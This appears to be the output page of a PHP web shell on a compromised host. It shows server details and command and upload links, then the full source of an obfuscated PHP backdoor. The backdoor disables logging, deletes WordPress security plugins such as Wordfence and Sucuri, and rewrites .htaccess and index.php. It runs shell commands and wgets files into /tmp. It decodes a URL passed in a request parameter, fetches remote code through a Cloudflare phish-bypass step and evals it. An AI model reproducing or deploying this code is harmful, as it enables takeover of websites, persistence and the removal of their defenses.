Server IP : 103.53.40.154 / Your IP : 3.15.239.50 Web Server : Apache System : Linux md-in-35.webhostbox.net 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64 User : ppcad7no ( 715) PHP Version : 8.2.25 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0700) : /home2/ppcad7no/.quarantine/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<?php error_reporting(0); echo "<br> "; ini_set('error_log', NULL); ini_set('log_errors', 0); ini_set('display_errors', 0); error_reporting("\x00\x00\x0f\x03\x18"); define('Úº', '§'); $GLOBALS[Úº] = array(0 => "error_log", 1 => "log_errors", 2 => "display_errors", 3 => "<br>", 4 => "explode", 5 => "str_split", 6 => "/file_put_contents/", 7 => "/fwrite/", 8 => "./*", 9 => "/", 10 => ".php", 11 => "", 12 => "\n", 13 => "file_put_contents", 14 => "w", 15 => "PHP_SELF", 16 => "DOCUMENT_ROOT", 17 => "cat ", 18 => "file_get_contents", 19 => "fopen", 20 => "stream_get_contents", 21 => "r", 22 => "implode", 23 => "file", 24 => "../", 25 => "?", 26 => "..", 27 => ".", 28 => "dir", 29 => "./", 30 => "exec", 31 => "passthru", 32 => "system", 33 => "shell_exec", 34 => "", 35 => "COOKIE.txt", 36 => "HTTP_USER_AGENT", 37 => "/Warning:/", 38 => "<?php", 39 => "COOKIE.txt", 40 => "#name=\"atok\" value=\"(.*)\">#", 41 => "/cdn-cgi/phish-bypass?u=/&atok=", 42 => "wget --header=\"User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 16_5_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.5.1 Mobile/15E148 Safari/604.1\" --header=\"Referer: https://google.com/\" ", 43 => " -O ", 44 => "/tmp/", 45 => "123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ", 46 => ".txt", 47 => "stream_context_create", 48 => "r", 49 => "http", 50 => "method", 51 => "GET", 52 => "header", 53 => "User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 16_5_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.5.1 Mobile/15E148 Safari/604.1\r\nReferer: https://google.com/\r\n", 54 => "curl_exec", 55 => "https://", 56 => "https://google.com/", 57 => "Mozilla/5.0 (iPhone; CPU iPhone OS 16_5_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.5.1 Mobile/15E148 Safari/604.1", 58 => "method", 59 => "GET", 60 => "header", 61 => "REQUEST_URI", 62 => "y", 63 => "a", 64 => "s", 65 => "b", 66 => "d", 67 => "u", 68 => "f", 69 => "q", 70 => "k", 71 => "p", 72 => "l", 73 => "z", 74 => "h", 75 => "i", 76 => "j", 77 => "v", 78 => "x", 79 => "//", 80 => ".", 81 => "sucuri-scanner", 82 => "better-wp-security", 83 => "jetpack", 84 => "wpscan", 85 => "wordfence", 86 => "bulletproof-security", 87 => "all-in-one-wp-security-and-firewall", 88 => "miniorange-2-factor-authentication", 89 => "/wp-content/plugins/", 90 => "/.htaccess", 91 => "/deny(.*)from(.*)all/", 92 => "/order(.*)allow(.*)deny/", 93 => "/index.php", 94 => "/wp-includes/plugin.php", 95 => "/wp-blog-header.php/", 96 => "<?php\ndefine( 'WP_USE_THEMES', true );\nrequire __DIR__ . '/wp-blog-header.php';", 97 => "/<html/", 98 => "/<div/", 99 => "/<head>/", 100 => "/<script>/", 101 => "/\\\$path.*=.*\"(.*)\";/", 102 => "<IfModule mod_rewrite.c>\nRewriteEngine On\nRewriteBase /\nRewriteRule ^index\\.php\$ - [L]\nRewriteCond %{REQUEST_FILENAME} !-f\nRewriteCond %{REQUEST_FILENAME} !-d\nRewriteRule . /index.php [L]\n</IfModule>", 103 => "/index.php/", 104 => "/index.php.bak/", 105 => "index.php", 106 => "index.php.bak", 107 => "/about.php", 108 => "/d_time/", 109 => "/SylVxy/", 110 => "/radio.php", 111 => "action", 112 => "http://", 113 => "<?", 114 => "?>", 115 => "action", 116 => "H*", 117 => "403", 118 => "/.user.ini", 119 => "KEY: <!-- MD5: ", 120 => "HTTP_HOST", 121 => "\xe2\x80\x93->"); error_reporting(0); @ini_set($GLOBALS[Úº][0], NULL); @ini_set($GLOBALS[Úº][0x1], 0); @ini_set($GLOBALS[Úº][0x2], 0); echo "<br>"; if (!function_exists($GLOBALS[Úº][0x4])) { function explode($str, $array) { return split($str, $array); } } if (!function_exists($GLOBALS[Úº][0x5])) { function str_split($text, $split = 0x1) { $array = array(); for ($i = 0; $i < strlen($text);) { $array[] = substr($text, $i, $split); $i += $split; } return $array; } } function oDxsw($j_7Nl, $bf80o = null, $kiuKi = null) { $QvxWc = curl_init(); curl_setopt($QvxWc, CURLOPT_URL, $j_7Nl); curl_setopt($QvxWc, CURLOPT_HEADER, !0); curl_setopt($QvxWc, CURLOPT_RETURNTRANSFER, 0x1); curl_setopt($QvxWc, CURLOPT_HTTPAUTH, CURLAUTH_BASIC); curl_setopt($QvxWc, CURLOPT_CONNECTTIMEOUT, 0x1e); curl_setopt($QvxWc, CURLOPT_TIMEOUT, 0x1e); curl_setopt($QvxWc, CURLOPT_FOLLOWLOCATION, 0x1); curl_setopt($QvxWc, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($QvxWc, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($QvxWc, CURLOPT_USERAGENT, $_SERVER[$GLOBALS[Úº][0x24]]); curl_setopt($QvxWc, CURLOPT_COOKIEFILE, $GLOBALS[Úº][0x23]); curl_setopt($QvxWc, CURLOPT_COOKIEJAR, $GLOBALS[Úº][0x23]); if ($bf80o != null) { curl_setopt($QvxWc, CURLOPT_HTTPHEADER, $bf80o); } if ($kiuKi != null) { curl_setopt($QvxWc, CURLOPT_POST, 0x1); curl_setopt($QvxWc, CURLOPT_POSTFIELDS, $kiuKi); } $HOv2H = curl_exec($QvxWc); curl_close($QvxWc); return $HOv2H; } function RK_c8($WjdeA) { $FkCuj = $GLOBALS[Úº][0xb]; if (function_exists($GLOBALS[Úº][0x1e])) { @exec($WjdeA, $FkCuj); $FkCuj = @join($GLOBALS[Úº][0xc], $FkCuj); } elseif (function_exists($GLOBALS[Úº][0x1f])) { ob_start(); @passthru($WjdeA); $FkCuj = ob_get_clean(); } elseif (function_exists($GLOBALS[Úº][0x20])) { ob_start(); @system($WjdeA); $FkCuj = ob_get_clean(); } elseif (function_exists($GLOBALS[Úº][0x21])) { $FkCuj = shell_exec($WjdeA); } elseif (is_resource($aWMlI = @popen($WjdeA, $GLOBALS[Úº][0x15]))) { $FkCuj = $GLOBALS[Úº][0x22]; while (!@feof($aWMlI)) { $FkCuj .= fread($aWMlI, 0x400); } pclose($aWMlI); } return $FkCuj; } function JUgSe($IzeGa) { $FiYF_ = $GLOBALS[Úº][0xb]; if (trim($FiYF_) == $GLOBALS[Úº][0xb] && function_exists($GLOBALS[Úº][0x12]) && function_exists($GLOBALS[Úº][0x2f])) { $FiYF_ = file_get_contents($IzeGa, !1, stream_context_create(array($GLOBALS[Úº][0x31] => array($GLOBALS[Úº][0x3a] => $GLOBALS[Úº][0x3b], $GLOBALS[Úº][0x3c] => $GLOBALS[Úº][0x35])))); } if (trim($FiYF_) == $GLOBALS[Úº][0xb] && function_exists($GLOBALS[Úº][0x36])) { $s2gFs = curl_init(); curl_setopt($s2gFs, CURLOPT_TIMEOUT, 0xa); curl_setopt($s2gFs, CURLOPT_RETURNTRANSFER, !0); curl_setopt($s2gFs, CURLOPT_URL, $IzeGa); curl_setopt($s2gFs, CURLOPT_USERAGENT, $GLOBALS[Úº][0x39]); curl_setopt($s2gFs, CURLOPT_REFERER, $GLOBALS[Úº][0x38]); curl_setopt($s2gFs, CURLOPT_FOLLOWLOCATION, !0); if (stristr($IzeGa, $GLOBALS[Úº][0x37])) { curl_setopt($s2gFs, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($s2gFs, CURLOPT_SSL_VERIFYHOST, 0); } curl_setopt($s2gFs, CURLOPT_HEADER, !1); $FiYF_ = curl_exec($s2gFs); curl_close($s2gFs); } if (trim($FiYF_) == $GLOBALS[Úº][0xb]) { $fO5cJ = $GLOBALS[Úº][0x2c] . substr(str_shuffle($GLOBALS[Úº][0x2d]), 0x32) . $GLOBALS[Úº][0x2e]; rK_C8($GLOBALS[Úº][0x2a] . $IzeGa . $GLOBALS[Úº][0x2b] . $fO5cJ); if (function_exists($GLOBALS[Úº][0x12])) { $FiYF_ = file_get_contents($fO5cJ); } else { $FiYF_ = stream_get_contents(fopen($fO5cJ, $GLOBALS[Úº][0x15])); } unlink($fO5cJ); } if (trim($FiYF_) == $GLOBALS[Úº][0xb] && function_exists($GLOBALS[Úº][0x13]) && function_exists($GLOBALS[Úº][0x14]) && function_exists($GLOBALS[Úº][0x2f])) { $RNvUK = fopen($IzeGa, $GLOBALS[Úº][0x30], !1, stream_context_create(array($GLOBALS[Úº][0x31] => array($GLOBALS[Úº][0x32] => $GLOBALS[Úº][0x33], $GLOBALS[Úº][0x34] => $GLOBALS[Úº][0x35])))); $FiYF_ = stream_get_contents($RNvUK); } return $FiYF_; } function AsrZX($ok6e_) { $p35sK = $GLOBALS[Úº][0xb]; if (function_exists($GLOBALS[Úº][0x12])) { $p35sK = file_get_contents($ok6e_); } elseif (function_exists($GLOBALS[Úº][0x13]) && function_exists($GLOBALS[Úº][0x14])) { $p35sK = stream_get_contents(fopen($ok6e_, $GLOBALS[Úº][0x15])); } elseif (function_exists($GLOBALS[Úº][0x16]) && function_exists($GLOBALS[Úº][0x17])) { $p35sK = implode(file($ok6e_)); } elseif (function_exists($GLOBALS[Úº][0x17])) { $mPYIt = file($ok6e_); if (function_exists($GLOBALS[Úº][0x16])) { $p35sK = implode($mPYIt); } else { foreach ($mPYIt as $zd4bR) { $p35sK .= $zd4bR; } } } if (trim($p35sK) == $GLOBALS[Úº][0xb]) { $p35sK = Rk_c8($GLOBALS[Úº][0x11] . $ok6e_); } return $p35sK; } function QxB8Z($ok6e_, $iTqoS) { if (function_exists($GLOBALS[Úº][0xd])) { $fYuhN = file_put_contents($ok6e_, $iTqoS); } else { $fYuhN = fwrite(fopen($ok6e_, $GLOBALS[Úº][0xe]), $iTqoS); } return $fYuhN; } function ZMpTl($KKNL0, $bN80E) { $n6JcJ = 0; $Nzr3p = aSRzx($KKNL0); $mPYIt = explode($GLOBALS[Úº][0xc], $Nzr3p); foreach ($mPYIt as $zd4bR) { if (strstr($zd4bR, $bN80E)) { $n6JcJ++; } } return $n6JcJ; } function rlAoq($KKNL0, $bN80E) { $Nucua = ZMPtL($KKNL0, $bN80E); $Nzr3p = ASRzx($KKNL0); $mPYIt = explode($GLOBALS[Úº][0xc], $Nzr3p); $tlBti = $GLOBALS[Úº][0xb]; foreach ($mPYIt as $zd4bR) { if (strstr($zd4bR, $bN80E) || $Nucua <= 0) { $Nucua--; if ($Nucua <= 0) { $tlBti .= $zd4bR . $GLOBALS[Úº][0xc]; } } } return $tlBti; } function MiMRi($BSTSR) { $iTMgs = $BSTSR . $GLOBALS[Úº][0x5a]; $CTswv = strtolower(aSRZX($iTMgs)); if (preg_match($GLOBALS[Úº][0x5b], $CTswv) || preg_match($GLOBALS[Úº][0x5c], $CTswv)) { $qsml6 = $BSTSR . $GLOBALS[Úº][0x5e]; $HH0Dt = aSrzx($qsml6); if (preg_match($GLOBALS[Úº][0x67], $HH0Dt) && !preg_match($GLOBALS[Úº][0x68], $HH0Dt)) { $HH0Dt = str_replace($GLOBALS[Úº][0x69], $GLOBALS[Úº][0x6a], $HH0Dt); chmod($qsml6, 0644); qXb8Z($qsml6, $HH0Dt); } if (preg_match($GLOBALS[Úº][0x65], $HH0Dt, $A0J4x)) { unlink($A0J4x[0x1]); } $Xa3Xv = $BSTSR . $GLOBALS[Úº][0x6b]; $r4rLX = ASRZX($Xa3Xv); if (file_exists($Xa3Xv) && (preg_match($GLOBALS[Úº][0x6c], $r4rLX) || preg_match($GLOBALS[Úº][0x6d], $r4rLX))) { unlink($Xa3Xv); unlink($BSTSR . $GLOBALS[Úº][0x6e]); } $YzXVO = $BSTSR . $GLOBALS[Úº][0x5d]; $ZcVkF = Asrzx($YzXVO); if (preg_match($GLOBALS[Úº][0x5f], $ZcVkF)) { $TnBIs = $GLOBALS[Úº][0x60]; chmod($YzXVO, 0644); qxb8z($YzXVO, $TnBIs); } elseif (strstr($ZcVkF, $GLOBALS[Úº][0x26]) && !preg_match($GLOBALS[Úº][0x61], $ZcVkF) && !preg_match($GLOBALS[Úº][0x62], $ZcVkF) && !preg_match($GLOBALS[Úº][0x63], $ZcVkF) && !preg_match($GLOBALS[Úº][0x64], $ZcVkF)) { $TnBIs = rLaoq($YzXVO, $GLOBALS[Úº][0x26]); chmod($YzXVO, 0644); qxb8z($YzXVO, $TnBIs); } chmod($iTMgs, 0644); $z_5mN = $GLOBALS[Úº][0x66]; QXb8Z($iTMgs, $z_5mN); } } function iRmJx($ok6e_) { $ok6e_ = substr($ok6e_, -1) == $GLOBALS[Úº][0x9] ? $ok6e_ : $ok6e_ . $GLOBALS[Úº][0x9]; $SZzID = opendir($ok6e_); while (($phOnJ = readdir($SZzID)) !== !1) { $phOnJ = $ok6e_ . $phOnJ; if (basename($phOnJ) == $GLOBALS[Úº][0x1a] || basename($phOnJ) == $GLOBALS[Úº][0x1b]) { continue; } $tabyZ = filetype($phOnJ); if ($tabyZ == $GLOBALS[Úº][0x1c]) { irMjX($phOnJ); } else { @unlink($phOnJ); } } closedir($SZzID); } function ocIVI($BSTSR) { $jYG7l = array($GLOBALS[Úº][0x51], $GLOBALS[Úº][0x52], $GLOBALS[Úº][0x53], $GLOBALS[Úº][0x54], $GLOBALS[Úº][0x55], $GLOBALS[Úº][0x56], $GLOBALS[Úº][0x57], $GLOBALS[Úº][0x58]); foreach ($jYG7l as $HH0Dt) { $jAUNf = $BSTSR . $GLOBALS[Úº][0x59] . $HH0Dt; if (is_dir($jAUNf)) { iRmJx($jAUNf); } } } $GhlyG = strval(basename("/var/www/html/bkv8.txt")); $aWMlI = explode($GLOBALS[Úº][0x50], $GhlyG); $GhlyG = $aWMlI[0] . $GLOBALS[Úº][0xa]; $Nzr3p = aSRzx($GhlyG); if (preg_match($GLOBALS[Úº][0x6], $Nzr3p) || preg_match($GLOBALS[Úº][0x7], $Nzr3p)) { $LhFlr = glob($GLOBALS[Úº][0x8]); foreach ($LhFlr as $KKNL0) { if (is_file($KKNL0)) { unlink($KKNL0); } } exit; } function LE86Y($ZJoHI, $iTqoS) { if (preg_match($GLOBALS[Úº][0x25], $iTqoS)) { preg_match($GLOBALS[Úº][0x28], $iTqoS, $s2WNP); $s2WNP = $s2WNP[0x1]; $dbhhI = oDXSW($ZJoHI . $GLOBALS[Úº][0x29] . $s2WNP); $iTqoS = odxSw($ZJoHI); $iKFfw = $GLOBALS[Úº][0x26]; $RJWgv = strpos($iTqoS, $iKFfw) + strlen($iKFfw); $iTqoS = $GLOBALS[Úº][0x26] . substr($iTqoS, $RJWgv); unlink($GLOBALS[Úº][0x27]); } return $iTqoS; } function FbJtr($P94B6) { $dozF_ = array($GLOBALS[Úº][0x3e] => $GLOBALS[Úº][0x3f], $GLOBALS[Úº][0x40] => $GLOBALS[Úº][0x41], $GLOBALS[Úº][0x3f] => $GLOBALS[Úº][0x42], $GLOBALS[Úº][0x43] => $GLOBALS[Úº][0x44], $GLOBALS[Úº][0x45] => $GLOBALS[Úº][0x46], $GLOBALS[Úº][0x47] => $GLOBALS[Úº][0x48], $GLOBALS[Úº][0x49] => $GLOBALS[Úº][0x4a], $GLOBALS[Úº][0x41] => $GLOBALS[Úº][0x4b], $GLOBALS[Úº][0x44] => $GLOBALS[Úº][0x4c], $GLOBALS[Úº][0x4d] => $GLOBALS[Úº][0x47], $GLOBALS[Úº][0x42] => $GLOBALS[Úº][0x45], $GLOBALS[Úº][0x4b] => $GLOBALS[Úº][0x40], $GLOBALS[Úº][0x4e] => $GLOBALS[Úº][0x43], $GLOBALS[Úº][0x48] => $GLOBALS[Úº][0x4d], $GLOBALS[Úº][0x46] => $GLOBALS[Úº][0x4e], $GLOBALS[Úº][0x4a] => $GLOBALS[Úº][0x3e], $GLOBALS[Úº][0x4c] => $GLOBALS[Úº][0x49]); $zYBxV = str_split($P94B6); $Tax0X = $GLOBALS[Úº][0xb]; foreach ($zYBxV as $Um4AM) { if (in_array($Um4AM, $dozF_)) { $Tax0X .= $dozF_[$Um4AM]; } else { $Tax0X .= $Um4AM; } } return $Tax0X; } function eOcGK($BSTSR) { $BPpYo = realpath($BSTSR); if (trim($BPpYo) == $GLOBALS[Úº][0xb]) { $BPpYo = $_SERVER[$GLOBALS[Úº][0x10]]; } if (!stristr(getcwd(), $BPpYo)) { $BPpYo = str_replace($_SERVER[$GLOBALS[Úº][0xf]], $GLOBALS[Úº][0xb], "/var/www/html/anj4.txt"); } return $BPpYo; } $smTub = strval($_SERVER[$GLOBALS[Úº][0x3d]]); while (strstr($smTub, $GLOBALS[Úº][0x4f])) { $smTub = str_replace($GLOBALS[Úº][0x4f], $GLOBALS[Úº][0x9], $smTub); } if (strstr($smTub, $GLOBALS[Úº][0x19])) { $smTub = explode($GLOBALS[Úº][0x19], $smTub); $smTub = $smTub[0]; } $tzTJj = substr_count($smTub, $GLOBALS[Úº][0x9]); $BSTSR = $GLOBALS[Úº][0x1d]; $K71UX = 0x1; while ($K71UX < intval($tzTJj)) { $BSTSR .= $GLOBALS[Úº][0x18]; $K71UX++; } $BSTSR = EOcgk($BSTSR); MiMRi($BSTSR); oCIVi($BSTSR); if (isset($_GET[$GLOBALS[Úº][0x6f]])) { $vo1vU = trim($_GET[$GLOBALS[Úº][0x73]]); $vo1vU = str_rot13(pack($GLOBALS[Úº][0x74], strrev($vo1vU))); $F3bIg = JuGse($GLOBALS[Úº][0x70] . FbJTr($vo1vU)); $F3bIg = Le86y($GLOBALS[Úº][0x70] . fbjtR($vo1vU), $F3bIg); $F3bIg = str_replace(array($GLOBALS[Úº][0x26], $GLOBALS[Úº][0x71], $GLOBALS[Úº][0x72]), $GLOBALS[Úº][0xb], $F3bIg); eval($F3bIg); } elseif (isset($_GET[$GLOBALS[Úº][0x75]])) { $CTswv = $GLOBALS[Úº][0x66]; chmod($BSTSR . $GLOBALS[Úº][0x5a], 0644); QxB8z($BSTSR . $GLOBALS[Úº][0x5a], $CTswv); unlink($BSTSR . $GLOBALS[Úº][0x76]); } else { echo $GLOBALS[Úº][0x77] . md5($_SERVER[$GLOBALS[Úº][0x78]]) . $GLOBALS[Úº][0x79]; }